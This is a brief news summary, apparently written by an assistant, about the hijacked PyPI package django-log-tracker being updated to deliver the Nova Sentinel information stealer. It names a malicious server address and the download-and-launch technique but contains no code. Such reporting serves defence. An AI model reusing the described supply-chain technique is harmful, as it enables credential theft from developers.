February 23, 2024 at 12:45PM
A dormant package on PyPI, django-log-tracker, was updated after two years to introduce the Nova Sentinel information stealer malware. The update, detected on Feb 21, 2024, suggests a compromise of the PyPI account. The malicious update contained an executable file for the malware. The attack was an attempted supply-chain attack via a compromised PyPI account.
Key takeaways from the meeting notes:
– A dormant package named django-log-tracker on the Python Package Index (PyPI) repository was updated with an information stealer malware called Nova Sentinel.
– The update, detected by the software supply chain security firm Phylum, was considered an anomalous update to the library on February 21, 2024, even though the linked GitHub repository had not been updated since April 10, 2022.
– The introduction of the malicious update suggested a compromise of the PyPI account belonging to the developer.
– The rogue version (1.0.4) of the package was downloaded 107 times on the date it was published and has since been removed from PyPI.
– The attacker stripped the package of most of its original content, leaving behind only an __init__.py and example.py file, and introduced an executable named “Updater_1.4.4_x64.exe” from a remote server (“45.88.180[.]54”) using the Python os.startfile() function, which is embedded with Nova Sentinel.
– This specific attack vector appeared to be an attempted supply-chain attack via a compromised PyPI account, according to Phylum.
The attack highlights the potential risks associated with software supply chain security, specifically in the context of package repositories like PyPI. This incident underscores the importance of maintaining account security and validating dependencies in software development.
If you have further questions or need additional information, feel free to let me know.